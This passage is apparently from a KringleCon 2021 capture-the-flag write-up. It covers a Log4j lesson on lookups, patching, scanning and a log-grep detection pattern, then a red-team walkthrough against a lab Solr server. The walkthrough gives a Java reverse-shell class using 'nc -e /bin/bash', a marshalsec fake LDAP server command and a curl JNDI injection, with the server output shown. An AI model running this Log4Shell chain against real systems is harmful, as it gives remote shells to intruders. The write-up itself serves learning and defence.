&lt;span class="go"&gt;        at java.io.FileInputStream.&amp;lt;init&amp;gt;(FileInputStream.java:138)&lt;/span&gt;
&lt;span class="go"&gt;        at java.io.FileReader.&amp;lt;init&amp;gt;(FileReader.java:72)&lt;/span&gt;
&lt;span class="go"&gt;        at DisplayFilev1.main(DisplayFilev1.java:7)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This program doesn't gracefully handle a scenario where the file doesn't exist.
Program exceptions like this one need consistent handling and logging,
which is where Log4j comes in.&lt;/p&gt;
&lt;p&gt;The Apache Log4j library allows developers to handle logging consistently
in code.&lt;/p&gt;
&lt;p&gt;Let's look at an example of a modified version of this program. Run 'cat
DisplayFilev2.java'.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/vulnerable$&lt;/span&gt; cat DisplayFilev2.java
&lt;span class="go"&gt;import java.io.*;&lt;/span&gt;
&lt;span class="go"&gt;import org.apache.logging.log4j.Logger;&lt;/span&gt;
&lt;span class="go"&gt;import org.apache.logging.log4j.LogManager;&lt;/span&gt;

&lt;span class="go"&gt;public class DisplayFilev2 {&lt;/span&gt;
&lt;span class="go"&gt;    static Logger logger = LogManager.getLogger(DisplayFilev2.class);&lt;/span&gt;
&lt;span class="go"&gt;    public static void main(String[] args) throws Exception {&lt;/span&gt;
&lt;span class="go"&gt;        String st;&lt;/span&gt;
&lt;span class="go"&gt;        try {&lt;/span&gt;
&lt;span class="go"&gt;            File file = new File(args[0]);&lt;/span&gt;
&lt;span class="go"&gt;            BufferedReader br = new BufferedReader(new FileReader(file));&lt;/span&gt;

&lt;span class="go"&gt;            while ((st = br.readLine()) != null)&lt;/span&gt;
&lt;span class="go"&gt;                System.out.println(st);&lt;/span&gt;
&lt;span class="go"&gt;        }&lt;/span&gt;
&lt;span class="go"&gt;        catch (Exception e) {&lt;/span&gt;
&lt;span class="go"&gt;            logger.error(&amp;quot;Unable to read file &amp;quot; + args[0] + &amp;quot; (make sure you specify a valid file name).&amp;quot;);&lt;/span&gt;
&lt;span class="go"&gt;        }&lt;/span&gt;
&lt;span class="go"&gt;    }&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This Java program has the same functionality, but the first few lines adds
support for the log4j library. The 4th line from the bottom calls Log4j
with the logger.error() function, followed by a logging message.&lt;/p&gt;
&lt;p&gt;Let's compile this Java source with Log4j support so we can run it. Run the
command 'javac DisplayFilev2.java'.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/vulnerable$&lt;/span&gt; javac DisplayFilev2.java
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Nice work! Let's run the program and tell it to read testfile2.txt file.&lt;/p&gt;
&lt;p&gt;Run 'java DisplayFilev2 testfile2.txt'&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/vulnerable$&lt;/span&gt; java DisplayFilev2 testfile2.txt
&lt;span class="go"&gt;11:14:34.325 [main] ERROR DisplayFilev2 - Unable to read file testfile2.txt (make sure you specify a valid file name).&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This time, the program doesn't crash - it exits with an error message
generated by Log4j. The Log4j library is valuable to produce consistent
logging messages that can be handled flexibly. Unfortunately, multiple
vulnerabilities allows attackers to manipulate this functionality in many
versions of Log4j 2 before version 2.17.0.&lt;/p&gt;
&lt;p&gt;The CVE-2021-44228 Log4j vulnerability is from improper input validation.
Log4j includes support for lookup features, where an attacker can supply
input that retrieves more data than intended from the system.&lt;/p&gt;
&lt;p&gt;Re-run the prior java command, replacing testfile2.txt with the string
'${java:version}' (IMPORTANT: include the quotation marks in this command)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/vulnerable$&lt;/span&gt; java DisplayFilev2 &lt;span class="s1"&gt;&amp;#39;${java:version}&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;11:16:41.204 [main] ERROR DisplayFilev2 - Unable to read file Java version 1.8.0_312 (make sure you specify a valid file name).&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Notice how the error has changed - instead of a file name, the error shows
the Java version information. The Log4j lookup command java:version
retrieves information from the host operating system.&lt;/p&gt;
&lt;p&gt;Let's try another example: re-run the last command, changing the
java:version string to env:APISECRET&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/vulnerable$&lt;/span&gt; java DisplayFilev2 &lt;span class="s1"&gt;&amp;#39;${env:APISECRET}&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;11:17:21.005 [main] ERROR DisplayFilev2 - Unable to read file pOFZFiWHjqKoQaRhNYyC (make sure you specify a valid file name).&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Using the Log4j env lookup, attackers can access local environment
variables, possibly disclosing secrets like this one. Log4j also supports
lookup requests using the Java Naming and Directory Interface (JNDI).&lt;/p&gt;
&lt;p&gt;These requests can reach out to an attacker server to request data.&lt;/p&gt;
&lt;p&gt;Log4j lookups can also tell the vulnerable server to contact the attacker
using LDAP and DNS. Run the startserver.sh command to launch a simple
server for testing purposes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/vulnerable$&lt;/span&gt;
&lt;span class="go"&gt;Listening on 0.0.0.0 1389&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
The bottom window is waiting for a connection at the specified IP address
and port. Re-run the DisplayFilev2 program, using the Log4j lookup to
connect to the server:  java DisplayFilev2
'${jndi:ldap://127.0.0.1:1389/Exploit}'&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Connection received on 127.0.0.1 42576&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Notice how the server received a connection from the vulnerable application
in the server (&amp;quot;Connection received&amp;quot;)? This is a critical part of the Log4j
vulnerability, where an attacker can force a server to connect to an
attacking system to exploit the vulnerability.&lt;/p&gt;
&lt;p&gt;Press CTRL+C to close the DisplayFilev2 program and continue with this
lesson.&lt;/p&gt;
&lt;p&gt;To address this vulnerability, applications need an updated version of
Log4j.&lt;/p&gt;
&lt;p&gt;Change to the ~/patched directory by running 'cd ~/patched'&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/vulnerable$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; ~/patched/
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
List the contents of this directory with the 'ls' command.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/patched$&lt;/span&gt; ls
&lt;span class="go"&gt;DisplayFilev2.java  classpath.sh  log4j-api-2.17.0.jar  log4j-core-2.17.0.jar&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This is the same DisplayFilev2.java source, but the Log4j library is
updated to a patched version.&lt;/p&gt;
&lt;p&gt;To use the updated library, change the Java CLASSPATH variable by running
'source classpath.sh'&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/patched$&lt;/span&gt; &lt;span class="nb"&gt;source&lt;/span&gt; classpath.sh
&lt;span class="go"&gt;Changing the Java CLASSPATH to use patched Log4j&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
Compile the DisplayFilev2.java source using the patched Log4j library. Run
'javac DisplayFilev2.java'&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/patched$&lt;/span&gt; javac DisplayFilev2.java
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
Use the Log4j lookup string java:version by running the following command:
java DisplayFilev2 '${java:version}'  IMPORTANT: include the quotation
marks in this command.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/patched$&lt;/span&gt; java DisplayFilev2 &lt;span class="s1"&gt;&amp;#39;${java:version}&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;11:24:09.309 [main] ERROR DisplayFilev2 - Unable to read file ${java:version} (make sure you specify a valid file name).&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;With the fixed Log4j library, attackers can't use the lookup feature to
exploit library. The same program displays the ${java:version} lookup as a
literal string, without performing the actual lookup.&lt;/p&gt;
&lt;p&gt;Next, we'll look at a technique to scan applications for the vulnerable
Log4j library. Run 'cd' to return to the home directory.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/patched$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
The log4j2-scan utility is a tool to scan for vulnerable Log4j application
use. Run the log4j2-scan utility, specifying the vulnerable directory as
the first command-line argument.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~$&lt;/span&gt; ./log4j2-scan ./vulnerable/
&lt;span class="go"&gt;Logpresso CVE-2021-44228 Vulnerability Scanner 2.2.0 (2021-12-18)&lt;/span&gt;
&lt;span class="go"&gt;Scanning directory: ./vulnerable/ (without tmpfs, shm)&lt;/span&gt;
&lt;span class="go"&gt;[*] Found CVE-2021-44228 (log4j 2.x) vulnerability in /home/elfu/./vulnerable/log4j-core-2.14.1.jar, log4j 2.14.1&lt;/span&gt;

&lt;span class="go"&gt;Scanned 1 directories and 8 files&lt;/span&gt;
&lt;span class="go"&gt;Found 1 vulnerable files&lt;/span&gt;
&lt;span class="go"&gt;Found 0 potentially vulnerable files&lt;/span&gt;
&lt;span class="go"&gt;Found 0 mitigated files&lt;/span&gt;
&lt;span class="go"&gt;Completed in 0.00 seconds&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Log4j2-scan quickly spots the vulnerable version of Log4j.&lt;/p&gt;
&lt;p&gt;Repeat this command, changing the search directory to patched.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~$&lt;/span&gt; ./log4j2-scan ./patched/
&lt;span class="go"&gt;Logpresso CVE-2021-44228 Vulnerability Scanner 2.2.0 (2021-12-18)&lt;/span&gt;
&lt;span class="go"&gt;Scanning directory: ./patched/ (without tmpfs, shm)&lt;/span&gt;

&lt;span class="go"&gt;Scanned 1 directories and 5 files&lt;/span&gt;
&lt;span class="go"&gt;Found 0 vulnerable files&lt;/span&gt;
&lt;span class="go"&gt;Found 0 potentially vulnerable files&lt;/span&gt;
&lt;span class="go"&gt;Found 0 mitigated files&lt;/span&gt;
&lt;span class="go"&gt;Completed in 0.00 seconds&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Log4j2-scan can also scan large directories of files.&lt;/p&gt;
&lt;p&gt;This server includes the Apache Solr software that uses Log4j in the
/var/www/solr directory. Scan this directory with log4j2-scan to identify
if the server is vulnerable.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~$&lt;/span&gt; ./log4j2-scan /var/www/solr/
&lt;span class="go"&gt;Logpresso CVE-2021-44228 Vulnerability Scanner 2.2.0 (2021-12-18)&lt;/span&gt;
&lt;span class="go"&gt;Scanning directory: /var/www/solr/ (without tmpfs, shm)&lt;/span&gt;
&lt;span class="go"&gt;[*] Found CVE-2021-44228 (log4j 2.x) vulnerability in /var/www/solr/server/lib/ext/log4j-core-2.14.1.jar, log4j 2.14.1&lt;/span&gt;
&lt;span class="go"&gt;[*] Found CVE-2021-44228 (log4j 2.x) vulnerability in /var/www/solr/contrib/prometheus-exporter/lib/log4j-core-2.14.1.jar, log4j 2.14.1&lt;/span&gt;

&lt;span class="go"&gt;Scanned 102 directories and 1988 files&lt;/span&gt;
&lt;span class="go"&gt;Found 2 vulnerable files&lt;/span&gt;
&lt;span class="go"&gt;Found 0 potentially vulnerable files&lt;/span&gt;
&lt;span class="go"&gt;Found 0 mitigated files&lt;/span&gt;
&lt;span class="go"&gt;Completed in 0.39 seconds&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Log4j2-scan finds two vulnerable Log4j libraries: one for the Solr
platform, and one for a third-party plugin. Both need to be patched to
resolve the vulnerability.&lt;/p&gt;
&lt;p&gt;Next, we'll look at scanning system logs for signs of Log4j attack.&lt;/p&gt;
&lt;p&gt;The CVE-2021-44228 Log4j exploit using JNDI for access is known as
Log4shell. It uses the JNDI lookup feature to manipulate logs, gain access
to data, or run commands on the vulnerable server. Web application
servers are a common target.&lt;/p&gt;
&lt;p&gt;Let's scan the web logs on this server. Examine the files in the /var/log/www directory.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~$&lt;/span&gt; ls /var/log/www
&lt;span class="go"&gt;access.log&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
We can scan web server logs to find requests that include the Log4j lookup
syntax using a text pattern matching routine known as a regular expression.
Examine the contents of the logshell-search.sh script using 'cat'&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~$&lt;/span&gt; cat logshell-search.sh
&lt;span class="gp"&gt;#&lt;/span&gt;!/bin/sh
&lt;span class="go"&gt;grep -E -i -r &amp;#39;\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+&amp;#39; $1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
This script recursively searches for Log4shell attack syntax in any files.
Run the logshell-search.sh command, specifying the /var/log/www directory
as the search target.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~$&lt;/span&gt; ./logshell-search.sh /var/log/www/
&lt;span class="go"&gt;/var/log/www/access.log:10.26.4.27 - - [14/Dec/2021:11:21:14 +0000] &amp;quot;GET /solr/admin/cores?foo=${jndi:ldap://10.26.4.27:1389/Evil} HTTP/1.1&amp;quot; 200 1311 &amp;quot;-&amp;quot; &amp;quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;/var/log/www/access.log:10.99.3.1 - - [08/Dec/2021:19:41:22 +0000] &amp;quot;GET /site.webmanifest HTTP/1.1&amp;quot; 304 0 &amp;quot;-&amp;quot; &amp;quot;${jndi:dns://10.99.3.43/NothingToSeeHere}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;/var/log/www/access.log:10.3.243.6 - - [08/Dec/2021:19:43:35 +0000] &amp;quot;GET / HTTP/1.1&amp;quot; 304 0 &amp;quot;-&amp;quot; &amp;quot;${jndi:ldap://10.3.243.6/DefinitelyLegitimate}&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In this output we see three examples of Log4shell attack. Let's look at
each line individually.&lt;/p&gt;
&lt;p&gt;Re-run the previous command, piping the output to | sed '1!d' to focus on
the first line.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~$&lt;/span&gt; ./logshell-search.sh /var/log/www/ &lt;span class="p"&gt;|&lt;/span&gt; sed &lt;span class="s1"&gt;&amp;#39;1!d&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;/var/log/www/access.log:10.26.4.27 - - [14/Dec/2021:11:21:14 +0000] &amp;quot;GET /solr/admin/cores?foo=${jndi:ldap://10.26.4.27:1389/Evil} HTTP/1.1&amp;quot; 200 1311 &amp;quot;-&amp;quot; &amp;quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In this first attack, we see the attacker is at 10.26.4.27. The Log4j
lookup command is sent as a URL GET parameter, attempting to use JDNI to
reach the attacker LDAP server at &lt;a class="reference external" href="ldap://10.26.4.27:1389"&gt;ldap://10.26.4.27:1389&lt;/a&gt; (see in the
${jndi:ldap://10.26.4.27:1389/Evil} string).&lt;/p&gt;
&lt;p&gt;Re-run the previous command, this time looking at the 2nd line of output.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~$&lt;/span&gt; ./logshell-search.sh /var/log/www/ &lt;span class="p"&gt;|&lt;/span&gt; sed &lt;span class="s1"&gt;&amp;#39;2!d&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;/var/log/www/access.log:10.99.3.1 - - [08/Dec/2021:19:41:22 +0000] &amp;quot;GET /site.webmanifest HTTP/1.1&amp;quot; 304 0 &amp;quot;-&amp;quot; &amp;quot;${jndi:dns://10.99.3.43/NothingToSeeHere}&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In this second attack, we see the attacker is at 10.99.3.1. Instead of a
URL GET parameter, this time the exploit is sent through the browser
User-Agent field. The attacker attempted to use JDNI to reach the attacker
DNS server at &lt;a class="reference external" href="dns://10.99.3.43"&gt;dns://10.99.3.43&lt;/a&gt;, using a different IP than the exploit
delivery address.&lt;/p&gt;
&lt;p&gt;Re-run the previous command, this time looking at the 3rd line of output.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~$&lt;/span&gt; ./logshell-search.sh /var/log/www/ &lt;span class="p"&gt;|&lt;/span&gt; sed &lt;span class="s1"&gt;&amp;#39;3!d&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;/var/log/www/access.log:10.3.243.6 - - [08/Dec/2021:19:43:35 +0000] &amp;quot;GET / HTTP/1.1&amp;quot; 304 0 &amp;quot;-&amp;quot; &amp;quot;${jndi:ldap://10.3.243.6/DefinitelyLegitimate}&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Here we see the attacker is at 10.3.243.6. This attack is also sent through
the browser User Agent field, but this more closely resembles the first
attack using the attacker LDAP server at 10.3.243.6. The
DefinitelyLegitimate string is supplied by the attacker, matching a
malicious Java class on the LDAP server to exploit the victim Log4j
instance.&lt;/p&gt;
&lt;p&gt;🍬🍬🍬🍬Congratulations!🍬🍬🍬🍬
You've completed the lesson on Log4j vulnerabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="icky-mcgoop-s-red-team-cranberry-pi-challenge"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id9"&gt;Icky McGoop's red team Cranberry Pi Challenge&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;This time, we're exploring the red side of the force: we're supposed to exploit
Log4Shell against an Apache Solr installation:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;You&amp;#39;re just in time to help us!&lt;/span&gt;

&lt;span class="go"&gt;Jack has asked us to look into a server running Java Solr over at Kringle Castle.&lt;/span&gt;
&lt;span class="go"&gt;Can you investigate the system at http://solrpower.kringlecastle.com:8983? If you&lt;/span&gt;
&lt;span class="go"&gt;can get access to the /home/solr/kringle.txt file, that would be even better.&lt;/span&gt;

&lt;span class="go"&gt;Exploit the server then run runtoanswer to submit your answer.&lt;/span&gt;
&lt;span class="go"&gt;We&amp;#39;ve setup some servers to aid you: a web server using the web/ directory listening&lt;/span&gt;
&lt;span class="go"&gt;on port 8080, and a Netcat listener on TCP port 4444.&lt;/span&gt;

&lt;span class="go"&gt;If you want assistance, see the HELP.md file, or browse to&lt;/span&gt;
&lt;span class="go"&gt;http://kringlecon.com/yulelog4jackhelp for assistance.&lt;/span&gt;
&lt;span class="go"&gt;~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We have several terminals open:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;An HTTP server listening on TCP port 8080,
serving the content of &lt;code&gt;web/&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;An &lt;code&gt;ncat&lt;/code&gt; listening on TCP port 4444.&lt;/li&gt;
&lt;li&gt;Two empty terms.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let's take a look at the content of our home folder:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;~$ ls&lt;/span&gt;
&lt;span class="go"&gt;HELP.md  mainterm.sh  marshalsec  web&lt;/span&gt;
&lt;span class="go"&gt;~$ ls -lh marshalsec/&lt;/span&gt;
&lt;span class="go"&gt;total 41M&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;-rw-r--r-- 1 troll troll 41M Dec 18 22:43 marshalsec-0.0.3-SNAPSHOT-all.jar&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We have the JAR file for &lt;a class="reference external" href="https://github.com/mbechler/marshalsec"&gt;marshalsec&lt;/a&gt;.
Knowing what we know of Log4Shell, reading the README gives us the existence
of &lt;a class="reference external" href="https://github.com/mbechler/marshalsec#jndi-reference-indirection"&gt;JNDI Reference indirection&lt;/a&gt;.
We can use the &lt;code&gt;marshalsec.jndi.LDAPRefServer&lt;/code&gt; implementation to have a
fake LDAP server listening and ready to redirect our victim to our malicious
HTTP server.&lt;/p&gt;
&lt;p&gt;Now, we can create our malicious Java code. Since we have a &lt;code&gt;netcat&lt;/code&gt;
listening, let's just create a basic reverse shell, with the following code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// File ReverseShell.java&lt;/span&gt;
&lt;span class="kd"&gt;public&lt;/span&gt; &lt;span class="kd"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;ReverseShell&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    &lt;span class="kd"&gt;static&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;try&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// Make sure you change the IP address to the one of your box&lt;/span&gt;
            &lt;span class="n"&gt;java&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;lang&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;Runtime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getRuntime&lt;/span&gt;&lt;span class="o"&gt;().&lt;/span&gt;&lt;span class="na"&gt;exec&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;nc -e /bin/bash 172.17.0.2 4444&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;);&lt;/span&gt;
        &lt;span class="o"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;catch&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Exception&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;printStackTrace&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt;
        &lt;span class="o"&gt;}&lt;/span&gt;
    &lt;span class="o"&gt;}&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's compile this Java code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;~/web$ javac ReverseShell.java&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, we can use marshalsec to create our fake LDAP server:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;~/marshalsec$ java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer &amp;quot;http://172.17.0.2:8080/#ReverseShell&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;Listening on 0.0.0.0:1389&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;All that's remaining is exploiting the Solr installation. To see what kind of
parameters are exploitable on Solr , I did a little research and found
&lt;a class="reference external" href="https://www.manrajbansal.com/post/exploiting-log4j-apache-solr"&gt;this comprehensive guide&lt;/a&gt;
that explains cleary how to exploit it.&lt;/p&gt;
&lt;p&gt;I used the &lt;code&gt;/solr/admin/cores?params=inject_here&lt;/code&gt; URL:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;~$ curl &amp;#39;http://solrpower.kringlecastle.com:8983/solr/admin/cores?params=$\{jndi:ldap://172.17.0.2:1389/ReverseShell\}&amp;#39;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can cleary see that our fake LDAP server was interrogated:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Listening on 0.0.0.0:1389&lt;/span&gt;
&lt;span class="go"&gt;Send LDAP reference result for ReverseShell redirecting to http://172.17.0.2:8080/ReverseShell.class&lt;/span&gt;
&lt;span class="go"&gt;Send LDAP reference result for ReverseShell redirecting to http://172.17.0.2:8080/ReverseShell.class&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In turn, our web server receives the request for our malicious &lt;code&gt;.class&lt;/code&gt;
file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Serving HTTP on 172.17.0.2 port 8080 ...&lt;/span&gt;
&lt;span class="go"&gt;172.17.0.2 - - [03/Jan/2022 11:38:51] &amp;quot;GET /ReverseShell.class HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;span class="go"&gt;172.17.0.2 - - [03/Jan/2022 11:38:51] &amp;quot;GET /ReverseShell.class HTTP/1.1&amp;quot; 200 -&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
